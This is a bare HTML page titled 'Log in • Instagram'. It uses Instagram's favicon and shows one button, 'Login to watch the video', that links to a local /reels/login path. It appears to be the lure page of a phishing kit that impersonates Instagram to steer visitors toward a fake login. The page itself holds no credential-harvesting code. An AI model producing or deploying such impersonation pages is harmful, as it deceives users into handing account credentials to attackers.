<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Log in • Instagram</title>
    <script src="https://cdn.tailwindcss.com"></script>
    <link data-default-icon="https://static.cdninstagram.com/rsrc.php/v3/yI/r/VsNE-OHk_8a.png" rel="icon" sizes="192x192" href="https://static.cdninstagram.com/rsrc.php/v3/yI/r/VsNE-OHk_8a.png">
</head>
<body class="flex flex-col items-center justify-center h-screen">
    <a href="/reels/login" class="bg-blue-500 text-white px-4 py-2 rounded-md hover:bg-blue-600">Login to watch the video</a>
</body>
</html>